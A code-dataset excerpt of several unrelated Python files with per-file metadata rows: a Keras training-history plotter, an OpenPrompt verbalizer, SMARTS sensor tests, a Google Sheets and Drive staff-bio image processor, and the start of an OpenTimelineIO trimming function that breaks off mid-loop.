def CollectLossFromHistory(self):
"""
This method collects the loss metric data from the history.
"""
try:
loss_val:str = 'loss'
if loss_val in self._history_keys:
self._losses = [s for s in self._history_keys if (loss_val == s)]
self._val_losses = [s for s in self._history_keys if ('val'+loss_val in s)]
self._epochs = len(self._history.epoch)
if len(self._losses) == 0 or len(self._val_losses) == 0:
print('Loss is missing in history')
return
if isNotNone(self._losses) and isNotNone(self._val_losses):
self._history_keys_list.remove(loss_val)
self._history_keys_list.remove('val_'+loss_val)
print("Found losses in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLossFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLearningRatesFromHistory(self):
"""
This method collects the learning rate metric data from the history.
"""
try:
lr_val:str = 'lr'
if lr_val in self._history_keys:
self._learning_rates = [s for s in self._history_keys if (lr_val == s)]
if isNotNone(self._learning_rates):
self._history_keys_list.remove(lr_val)
print("Found learning rates in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLearningRatesFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectFromHistory(self):
"""
This method collects all necessary training information from the history.
"""
if self._using_history:
try:
print("Collect losses from history...")
self.CollectLossFromHistory()
print("Collect learning rate from history...")
self.CollectLearningRatesFromHistory()
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_stdcc_list, self._val_acc_stdcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_topkcc_list, self._val_acc_topkcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
else:
print('No history initialized!')
def DirectPlotHistory(self):
"""
This method helps to plot a Keras history containing losses, accuracy and possibly the learning rates.
"""
try:
fig_num:int = 1
## Loss
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot',
train_val_lists = [self._losses, self._val_losses])
fig_num += 1
## Top k Categorical Crossentropy
if ('top_k_categorical_accuracy' in self._history_keys) and isNotNone(self._acc_topkcc_list) and isNotNone(self._val_acc_topkcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot',
train_val_lists = [self._acc_topkcc_list, self._val_acc_topkcc_list])
fig_num += 1
## Categorical Crossentropy
if 'categorical_accuracy' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
## General
if 'acc' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
if 'lr' in self._history_keys and isNotNone(self._learning_rates):
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.DirectPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def OldPlotHistory(self):
"""
This method plots the history in the old way.
"""
try:
fig_num:int = 1
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot')
fig_num += 1
if 'acc' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'acc',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot')
fig_num += 1
if 'top_k_categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot')
fig_num += 1
if 'categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot')
fig_num += 1
if 'lr' in self._history_keys:
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.OldPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def AccOrLossPlot(self, fig_num:int, title:str, metric:str, axis_labels:list = ['train', 'validation'], history_labels:list = ['Metric', 'Epoch'], extender:str = '_epoch_plot', train_val_lists:list = None):
"""
This method wraps the plot creation for a single metric of the Keras training history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
if metric == 'loss': plt.title(self.CalcResultLoss(history=self._history))
else: plt.title(self.CalcResultAccuracy(history=self._history, metric=metric))
if not self._new_style:
plt.plot(self._history.history[metric], color='blue', label=axis_labels[0])
plt.plot(self._history.history['val_' + metric], color='orange', label=axis_labels[1])
else:
if (train_val_lists != None) and (len(train_val_lists) == 2):
for l in train_val_lists[0]: plt.plot(self._epochs, self._history.history[l], color='b', label='Training ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
for l in train_val_lists[1]: plt.plot(self._epochs, self._history.history[l], color='g', label='Validation ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='lower right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender=extender)
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.AccOrLossPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def LearningPlot(self, fig_num:int, title:str = 'Model Learning Rate', metric:str = 'lr', axis_labels:list = ['train', 'validation'], history_labels:list = ['Learning Rate', 'Epoch'], extender:str = 'learning_rate_epoch_plot'):
"""
This method plots the single learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
plt.title(self.CalcResultLearnRate(history=self._history))
if not self._new_style:
plt.plot(self._history.history[metric], color='red', label='learning rate')
else:
for l in self._learning_rates: plt.plot(self._epochs, self._history.history[l], color='r', label='Learning Rate (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='upper right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender='learning_rate_epoch_plot')
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.LearningPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultAccuracy(self, history, metric:str = 'acc'):
"""
This method shows the training accuracy results.
:param history: history of the training
"""
try:
return "Training accuracy: %.2f%% / Validation accuracy: %.2f%%" % (100*history.history[metric][-1], 100*history.history['val_'+metric][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultAccuracy]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLoss(self, history):
"""
This method shows the training loss results.
:param history: history of the training
"""
try:
return 'Training loss: '+ str(history.history['loss'][-1])[:-6] +' / Validation loss: ' + str(history.history['val_loss'][-1])[:-6]
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLoss]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLearnRate(self, history):
"""
This method shows the training learning rate.
:param history: history of the training
"""
try:
return 'Training Learn Rate: '+ str(history.history['lr'][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLearnRate]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
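# A hedged usage sketch (assumes a compiled Keras model `model` and training
# data `x_train`/`y_train`, which are not part of this file):
#
#   history = model.fit(x_train, y_train, validation_split=0.2, epochs=10)
#   plotter = HistoryPlotter(model_description='my_model', history=history,
#                            save_it=False, new_style=False)
#   plotter.PlotHistory()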
| Scripts/Plotter/PlotHistory.py | 18,766 | This class provides a History plotting pipeline using mathplot.
This method wrapp the plot creation for a single metric of the keras train history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
This method show the train acc results.
:param history: history of the training
This method show the train learn rate.
:param history: history of the training
This method show the train loss results.
:param history: history of the training
This method collect the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
This method collect all necessary train informations from the history.
This method collect the learning rate metric data from the history.
This method collect the loss metric data from the history.
This method helps to plot a keras history containing losses, accuracy and possibly least learning rates.
This method plot a the single learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
This method plot the history in the old way.
Thise method allow to plot a history from directly a keras history.
Plotting from log is not yet implemented!
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
This for a later implemented part of the toolTODO: Log file history plotting is not yet implementedelse: self.PlotHistoryFromLog() Loss Top k Categorical Crossentropy Categorical Crossentropy General | 2,221 | en | 0.780908 |
import json
from transformers.tokenization_utils import PreTrainedTokenizer
from yacs.config import CfgNode
from openprompt.data_utils import InputFeatures
import re
from openprompt import Verbalizer
from typing import *
import torch
import torch.nn as nn
import torch.nn.functional as F
from openprompt.utils.logging import logger
class One2oneVerbalizer(Verbalizer):
r"""
The basic manually defined verbalizer class, this class is inherited from the :obj:`Verbalizer` class.
This class restricts the use of label words to one word per label. For a verbalizer with fewer constraints,
please use the basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
"""
def __init__(self,
tokenizer: PreTrainedTokenizer,
num_classes: Optional[int] = None,
classes: Optional[List] = None,
label_words: Optional[Union[Sequence[str], Mapping[str, str]]] = None,
prefix: Optional[str] = " ",
multi_token_handler: Optional[str] = "first",
post_log_softmax: Optional[bool] = True,
):
super().__init__(tokenizer=tokenizer, num_classes=num_classes, classes=classes)
self.prefix = prefix
self.multi_token_handler = multi_token_handler
self.label_words = label_words
self.post_log_softmax = post_log_softmax
def on_label_words_set(self):
super().on_label_words_set()
self.label_words = self.add_prefix(self.label_words, self.prefix)
self.generate_parameters()
@staticmethod
def add_prefix(label_words, prefix):
r"""Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
"""
new_label_words = []
if isinstance(label_words[0], list):
assert max([len(w) for w in label_words]) == 1, "Providing multiple label words, you should use other verbalizers instead."
label_words = [w[0] for w in label_words]
for word in label_words:
if word.startswith("<!>"):
new_label_words.append(word.split("<!>")[1])
else:
new_label_words.append(prefix + word)
return new_label_words
def generate_parameters(self) -> List:
r"""In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
"""
words_ids = []
for word in self.label_words:
word_ids = self.tokenizer.encode(word, add_special_tokens=False)
if len(word_ids) > 1:
logger.warning("Word {} is split into multiple tokens: {}. \
If this is not what you expect, try using another word for this verbalizer" \
.format(word, self.tokenizer.convert_ids_to_tokens(word_ids)))
words_ids.append(word_ids)
max_len = max([len(ids) for ids in words_ids])
words_ids_mask = [[1]*len(ids) + [0]*(max_len-len(ids)) for ids in words_ids]
words_ids = [ids+[0]*(max_len-len(ids)) for ids in words_ids]
words_ids_tensor = torch.tensor(words_ids)
words_ids_mask = torch.tensor(words_ids_mask)
self.label_words_ids = nn.Parameter(words_ids_tensor, requires_grad=False)
self.label_words_mask = nn.Parameter(words_ids_mask, requires_grad=False)
def project(self,
logits: torch.Tensor,
**kwargs,
) -> torch.Tensor:
r"""
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
logits (:obj:`torch.Tensor`): The original logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
"""
label_words_logits = logits[:, self.label_words_ids]
label_words_logits = self.handle_multi_token(label_words_logits, self.label_words_mask)
return label_words_logits
def process_logits(self, logits: torch.Tensor, **kwargs):
r"""A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
logits (:obj:`torch.Tensor`): The original logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
"""
# project
label_words_logits = self.project(logits, **kwargs) #Output: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label)
if self.post_log_softmax:
# normalize
label_words_probs = self.normalize(label_words_logits)
# calibrate
if hasattr(self, "_calibrate_logits") and self._calibrate_logits is not None:
label_words_probs = self.calibrate(label_words_probs=label_words_probs)
# convert to logits
label_words_logits = torch.log(label_words_probs+1e-15)
return label_words_logits
def normalize(self, logits: torch.Tensor) -> torch.Tensor:
"""
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The probabilities over the label words set.
"""
batch_size = logits.shape[0]
return F.softmax(logits.reshape(batch_size, -1), dim=-1).reshape(*logits.shape)
def calibrate(self, label_words_probs: torch.Tensor, **kwargs) -> torch.Tensor:
r"""
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
"""
shape = label_words_probs.shape
assert self._calibrate_logits.dim() == 1, "self._calibrate_logits are not 1-d tensor"
calibrate_label_words_probs = self.normalize(self.project(self._calibrate_logits.unsqueeze(0), **kwargs))
assert calibrate_label_words_probs.shape[1:] == label_words_probs.shape[1:] \
and calibrate_label_words_probs.shape[0]==1, "shape not match"
label_words_probs /= (calibrate_label_words_probs+1e-15)
# normalize # TODO Test the performance
norm = label_words_probs.reshape(shape[0], -1).sum(dim=-1,keepdim=True) # TODO Test the performance of detaching()
label_words_probs /= norm
return label_words_probs
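# A hedged usage sketch (the classes and label words are illustrative; the
# tokenizer is assumed to come from OpenPrompt's load_plm helper):
#
#   verbalizer = One2oneVerbalizer(tokenizer=tokenizer,
#                                  classes=["negative", "positive"],
#                                  label_words={"negative": "bad",
#                                               "positive": "good"})
#   label_logits = verbalizer.process_logits(logits_over_vocab)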
| openprompt/prompts/one2one_verbalizer.py | 8,050 | The basic manually defined verbalizer class, this class is inherited from the :obj:`Verbalizer` class.
This class restrict the use of label words to one words per label. For a verbalzer with less constraints,
please use Basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The logits over the label words set.
A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
logits (:obj:`torch.Tensor`): The orginal logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
logits (:obj:`torch.Tensor`): The orginal logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
projectOutput: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label) normalize calibrate convert to logits normalize TODO Test the performance TODO Test the performance of detaching() | 2,992 | en | 0.657458 |
# MIT License
#
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from unittest import mock
import numpy as np
import pytest
from helpers.scenario import temp_scenario
from smarts.core.agent_interface import AgentInterface
from smarts.core.coordinates import Heading, Pose
from smarts.core.plan import Plan
from smarts.core.scenario import Scenario
from smarts.core.sensors import DrivenPathSensor, WaypointsSensor
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
AGENT_ID = "Agent-007"
def test_driven_path_sensor():
vehicle = mock.Mock()
sim = mock.Mock()
max_path_length = 5
sensor = DrivenPathSensor(vehicle, max_path_length=max_path_length)
positions = [(x, 0, 0) for x in range(0, 100, 10)]
sim_times = list(range(0, 50, 5))
for idx, (position, sim_time) in enumerate(zip(positions, sim_times)):
sim.elapsed_sim_time = sim_time
vehicle.position = position
sensor.track_latest_driven_path(sim)
if idx >= 3:
assert sensor.distance_travelled(sim, last_n_steps=3) == 30
assert sensor.distance_travelled(sim, last_n_seconds=10) == 20
assert len(sensor()) <= max_path_length
sensor.teardown()
@pytest.fixture
def scenarios():
with temp_scenario(name="straight", map="maps/6lane.net.xml") as scenario_root:
ego_missions = [
t.Mission(
t.Route(
begin=("edge-west-WE", 0, 10),
end=("edge-east-WE", 0, "max"),
)
),
]
gen_scenario(
t.Scenario(ego_missions=ego_missions),
output_dir=scenario_root,
)
yield Scenario.variations_for_all_scenario_roots(
[str(scenario_root)], [AGENT_ID]
)
def test_waypoints_sensor(scenarios):
scenario = next(scenarios)
sim = mock.Mock()
vehicle = mock.Mock()
vehicle.pose = Pose(
position=np.array([33, -65, 0]),
orientation=[0, 0, 0, 0],
heading_=Heading(0),
)
mission = scenario.missions[AGENT_ID]
plan = Plan(scenario.road_map, mission)
sensor = WaypointsSensor(vehicle, plan)
waypoints = sensor()
assert len(waypoints) == 3
| smarts/core/tests/test_sensors.py | 3,324 | MIT License Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | 1,103 | en | 0.859904 |
from PIL import Image
import gspread
import hashlib
from googleapiclient.errors import HttpError
from oauth2client.service_account import ServiceAccountCredentials
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
import io
import json
def has_transparency(image: Image.Image) -> bool:
    """Return True if the image actually uses palette or alpha transparency."""
if image.mode == "P":
transparent = image.info.get("transparency", -1)
for _, index in image.getcolors():
if index == transparent:
return True
elif image.mode == "RGBA":
extrema = image.getextrema()
if extrema[3][0] < 255:
return True
return False
# from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python
def crop_image(image):
width, height = image.size
if width == height:
return image
offset = int(abs(height - width) / 2)
if width > height:
image = image.crop([offset, 0, width - offset, height])
else:
image = image.crop([0, offset, width, height - offset])
return image
def resize_image(image):
width, height = image.size
new_width = 256
if width < new_width:
return image
new_height = new_width * height / width
    # Image.ANTIALIAS was removed in Pillow 10; LANCZOS is the same filter.
    return image.resize((new_width, int(new_height)), Image.LANCZOS)
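# A minimal sketch of how the helpers above compose (the file name here is
# hypothetical); the main loop below runs the same pipeline per staff member:
#
#   img = Image.open("holding/example.png")
#   img = resize_image(crop_image(img))  # center-crop to 1:1, then <=256px wide
#   ext = "png" if has_transparency(img) else "jpg"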
def LongestBio(section: list) -> int:
    """Return the length of the longest bio description in the section."""
    return max((len(item["description"]) for item in section), default=0)
def sortBioLength(bioList: list) -> list:
    """Return the bios sorted by description length, longest first."""
    return sorted(bioList, key=lambda item: len(item["description"]),
                  reverse=True)
# Deals with getting all the auth setup for the connecting to GSheet
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
# Needs to link to auth file given by google dev dashboard
creds = ServiceAccountCredentials.from_json_keyfile_name("secrets/googleAuth.json", scope)
client = gspread.authorize(creds)
sheet = client.open("Low Ink Staff Bio Form (Responses)") # Name of the google sheet file
worksheet = sheet.worksheet("input") # name of the sheet in question
worksheetData = worksheet.get_all_records()
# This is the auth scope for Google Drive API
creds = None
if os.path.exists('secrets/token.pickle'):
with open('secrets/token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'secrets/credentials.json', ['https://www.googleapis.com/auth/drive'])
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('secrets/token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
commentator = []
former = []
headTO = []
orgHead = []
production = []
staff = []
artists = []
for lines in worksheetData:
output = {}
if lines["isStaff"] in ["Yes (Staff temp invite)", "Yes", "Yes (Staff, temp, invite)"]:
print("Outputting for: {}".format(lines["name"]))
staffID = hashlib.md5(lines["name"].encode("utf-8")).hexdigest()
# Obtains image from google drive
imageID = (lines["image"].split("?id="))[1] # get the G Drive file ID from share
request = service.files().get_media(fileId=imageID)
fh = io.FileIO("holding/{}.png".format(staffID), "wb") # states where the file saves to
# Downloads file
downloader = MediaIoBaseDownload(fh, request)
output_file_format = 'png'
done = False
while done is False:
try:
status, done = downloader.next_chunk()
except HttpError as e:
print("Could not output image. Please provide file '{}' manually.".format("output/images/{}.png").format(staffID))
print("Error message: '{}'".format(e.error_details[0]["message"]))
break
if done is True:
# Crops image to be 1:1
staff_image = crop_image(Image.open("holding/{}.png".format(staffID)))
staff_image = resize_image(staff_image)
if has_transparency(staff_image):
staff_image.convert("P", palette=Image.ADAPTIVE).save("output/images/{}.png".format(staffID))
else:
staff_image.convert("RGB", palette=Image.ADAPTIVE).save("output/images/{}.jpg".format(staffID))
output_file_format = 'jpg'
staff_image.close()
output = {
"title": lines["name"],
"description": (lines["bio"].replace("\n", "")).replace("\r", " "),
"imagePath": "images/Staff/{}.{}".format(staffID, output_file_format),
"twitter": lines["twitter"],
"credit": lines["credits"]
}
# Save bio to right list
if lines["header"] == "General Staff":
staff.append(output)
elif lines["header"] == "Commentators":
commentator.append(output)
elif lines["header"] == "Head TO":
headTO.append(output)
elif lines["header"] == "Production & Development":
production.append(output)
elif lines["header"] == "Org Head":
orgHead.append(output)
elif lines["header"] == "Temp staff":
staff.append(output)
elif lines["header"] == "Former staff":
former.append(output)
elif lines["header"] == "Guest Staff":
staff.append(output)
elif lines["header"] == "Artist":
artists.append(output)
staffFile = [
{"elemClassName": "staff-layout-grid",
"contents": sortBioLength(staff)},
{"elemClassName": "org-head-grid",
"contents": sortBioLength(orgHead)},
{"elemClassName": "head-TO-grid",
"contents": sortBioLength(headTO)},
{"elemClassName": "production-grid",
"contents": sortBioLength(production)},
{"elemClassName": "commentator-grid",
"contents": sortBioLength(commentator)},
{"elemClassName": "former-staff-grid",
"contents": sortBioLength(former)},
{"elemClassName": "artists-staff-grid",
"contents": sortBioLength(artists)}
]
with open('output/staff.json', 'w') as file:
json.dump(staffFile, file)
| dataProcessor/processBio.py | 6,955 | from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python Deals with getting all the auth setup for the connecting to GSheet Needs to link to auth file given by google dev dashboard Name of the google sheet file name of the sheet in question This is the auth scope for Google Drive API If there are no (valid) credentials available, let the user log in. Save the credentials for the next run Obtains image from google drive get the G Drive file ID from share states where the file saves to Downloads file Crops image to be 1:1 Save bio to right list | 609 | en | 0.875758 |
#
# Copyright Contributors to the OpenTimelineIO project
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Algorithms for timeline objects."""
import copy
from . import (
track_algo
)
def timeline_trimmed_to_range(in_timeline, trim_range):
"""Returns a new timeline that is a copy of the in_timeline, but with items
outside the trim_range removed and items on the ends trimmed to the
trim_range. Note that the timeline is never expanded, only shortened.
Please note that you could do nearly the same thing non-destructively by
just setting the Track's source_range but sometimes you want to really cut
away the stuff outside and that's what this function is meant for."""
new_timeline = copy.deepcopy(in_timeline)
for track_num, child_track in enumerate(in_timeline.tracks):
# @TODO: put the trim_range into the space of the tracks
# new_range = new_timeline.tracks.transformed_time_range(
# trim_range,
# child_track
# )
# trim the track and assign it to the new stack.
